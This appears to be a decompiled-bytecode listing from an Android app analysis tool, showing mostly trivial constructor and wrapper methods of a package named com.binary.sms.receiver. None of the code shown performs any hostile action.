    3invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    4return-void
    Cross References
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    1iput-object p1, p0, Lcom/binary/sms/receiver/SkeletonActivity$3;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    3invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    4return-void
    Cross References
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    1iput-object p1, p0, Lcom/binary/sms/receiver/SkeletonActivity$4;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    3invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    4return-void
    Cross References
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    1iput-object p1, p0, Lcom/binary/sms/receiver/SkeletonActivity$5;->this$0:Lcom/binary/sms/receiver/SkeletonActivity;
    3invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    4return-void
    Cross References
    APIs
    • com.binary.sms.receiver.SkeletonActivity.getTodayString
    Position Instruction Meta Information
    0.prologue
    2invoke-static {}, Lcom/binary/sms/receiver/SkeletonActivity;->getTodayString()Ljava/lang/String;
    3move-result-object v0
    4return-object v0
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    3return-void
    Cross References
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    3return-void
    Cross References
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    3return-void
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    3return-void
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    3return-void
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    3return-void
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    3return-void
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    3return-void
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    3return-void
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    3return-void
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    3return-void
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    3return-void
    Cross References
    APIs
    • com.binary.sms.receiver.SkeletonActivity.chmodRec
    Position Instruction Meta Information
    0.prologue
    2invoke-direct {p0, p1}, Lcom/binary/sms/receiver/SkeletonActivity;->chmodRec(Ljava/io/File;)V
    3return-void
    APIs
    • android.content.BroadcastReceiver.<init>
    Position Instruction Meta Information
    0.prologue
    2invoke-direct {p0}, Landroid/content/BroadcastReceiver;-><init>()V
    3return-void
    APIs
    • java.lang.Object.<init>
    Position Instruction Meta Information
    0.prologue
    2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    3return-void